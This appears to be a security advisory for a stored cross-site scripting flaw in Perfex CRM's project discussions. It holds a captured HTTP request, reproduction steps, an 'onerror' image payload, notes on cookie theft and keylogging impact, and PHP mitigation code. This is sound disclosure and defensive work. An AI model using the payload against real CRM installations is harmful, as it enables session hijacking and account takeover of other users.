A Stored Cross-Site Scripting (XSS) vulnerability has been identified in the Project Discussions Module of Perfex CRM. This issue permits authenticated client users to inject malicious JavaScript payloads into the discussion description. Consequently, the injected code is executed whenever another user views the discussion. This vulnerability poses significant security risks, including session hijacking, phishing attacks, and the potential for complete account compromise. It is critical to address this vulnerability promptly to safeguard user data and ensure system integrity.
Post Request:
POST /perfex/clients/project/2 HTTP/1.1
Host: 192.168.1.11
Content-Length: 173
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://192.168.1.11
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.11/perfex/clients/project/2?group=project_discussions
Accept-Encoding: gzip, deflate, br
Cookie: contact_language=english; csrf_cookie_name=80389ebf9f4a421a35838e8b8fa60994; sp_session=vcki9i2pek4meo4qhpc5m5r8urefusof
Connection: keep-alive

csrf_token_name=80389ebf9f4a421a35838e8b8fa60994&project_id=2&action=new_discussion&subject=Testing+Discussion&description=%26lt%3Bimg+src%3Dx+onerror%3Dalert%281%29%26gt%3B
Affected Endpoint
POST /perfex/clients/project/{project_id} HTTP/1.1
Proof-of-Concept (PoC)
- The client logs in to Perfex CRM.
- Navigates to any project and opens the Discussions tab. Example URL: /clients/project/{project_id}?group=project_discussions
- Creates a new discussion and submits the following XSS payload in the Description field:
<img src=x onerror=alert(1)>

Impact
- Attackers can steal admin session cookies via JavaScript
- Automatic Execution: Unlike click-based XSS, this payload triggers instantly when the admin views the page.
- Full Account Takeover: Inject a keylogger to capture admin input.
Root Cause Analysis
Perfex CRM fails to properly sanitize user input in the project discussion section.
- Expected Behavior: User input should be HTML encoded or filtered for JavaScript execution.
- Actual Behavior: The system renders user input as raw HTML, leading to stored XSS.
- Flawed HTML Entity Decoding: The system decodes &lt; and &gt; back into < and >, allowing stored JavaScript execution.
Recommended Mitigations
- Sanitize User Input: Apply htmlspecialchars() or strip_tags() on user-submitted comments.
- Use Content Security Policy (CSP): Implement CSP rules to block inline JavaScript execution.
- Enable XSS Protection in CodeIgniter: Use $this->security->xss_clean($input) before rendering data.
- Validate & Escape Output Properly: Ensure all user-generated content is escaped before being displayed.
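The following PHP snippet is an added illustration of the root cause above and of the sanitization, CSP and output-escaping mitigations; it is not Perfex CRM's code. The function names, the div wrapper and the CSP source lists are hypothetical, and the sample description is the PoC request's description field after URL decoding.

```php
<?php
// Added example, not Perfex CRM's own code. Function names and the
// page layout are hypothetical; the sample value is the description
// field from the PoC request body after URL decoding.
declare(strict_types=1);

// Constructed sample: the description arrives already entity-encoded,
// exactly as in the PoC request body (%26lt%3B ... %26gt%3B).
const SAMPLE_DESCRIPTION = '&lt;img src=x onerror=alert(1)&gt;';

/**
 * Flawed pattern from the root-cause section: the stored value is
 * entity-decoded and then concatenated into the page as raw HTML, so
 * "&lt;img ...&gt;" becomes a live <img> tag with an onerror handler.
 */
function render_discussion_flawed(string $description): string
{
    $decoded = html_entity_decode($description, ENT_QUOTES, 'UTF-8');
    return '<div class="discussion-body">' . $decoded . '</div>';
}

/**
 * Hardened pattern: whatever normalisation happens first, the value is
 * escaped for the HTML context immediately before output. '<', '>',
 * '&', '"' and "'" are emitted as entities, so the browser shows the
 * payload as text and never parses it as markup.
 */
function render_discussion_escaped(string $description): string
{
    $decoded = html_entity_decode($description, ENT_QUOTES, 'UTF-8');
    $safe = htmlspecialchars($decoded, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="discussion-body">' . $safe . '</div>';
}

/**
 * Input-side filter for fields that must never carry markup: strip tags
 * on the way in. This complements output escaping rather than replacing
 * it, because the same value may later be rendered in other contexts and
 * stripping cannot fix what is already stored.
 */
function sanitize_plain_text(string $input): string
{
    return strip_tags(html_entity_decode($input, ENT_QUOTES, 'UTF-8'));
}

/**
 * Defence in depth: a CSP whose script-src omits 'unsafe-inline' makes the
 * browser refuse inline event handlers such as onerror even if an escaping
 * bug slips through. The source lists must match what the deployment loads.
 */
function send_csp_header(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'");
}

// Self-check from the command line: php render_example.php
if (PHP_SAPI === 'cli') {
    $flawed   = render_discussion_flawed(SAMPLE_DESCRIPTION);
    $escaped  = render_discussion_escaped(SAMPLE_DESCRIPTION);
    $stripped = sanitize_plain_text(SAMPLE_DESCRIPTION);

    // The flawed renderer must reproduce the live tag; the hardened paths must not.
    if (strpos($flawed, '<img src=x onerror=alert(1)>') === false) {
        throw new RuntimeException('flawed renderer did not reproduce the issue');
    }
    if (strpos($escaped, '<img') !== false || strpos($stripped, '<') !== false) {
        throw new RuntimeException('hardened path still emits markup');
    }
    echo "flawed  : $flawed\n";
    echo "escaped : $escaped\n";
    echo "stripped: " . var_export($stripped, true) . "\n";
}
```

The decisive difference between the two renderers is the htmlspecialchars() call placed after any decoding and directly before output; escaping that happens earlier is undone by a later html_entity_decode(). An input filter such as xss_clean() is a useful first line, but it models a fixed set of encodings, so output escaping chosen for the rendering context remains the control that actually closes this bug.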
The development team has been informed of the identified vulnerability. The developers have confirmed the issue, and an official patch is currently pending release.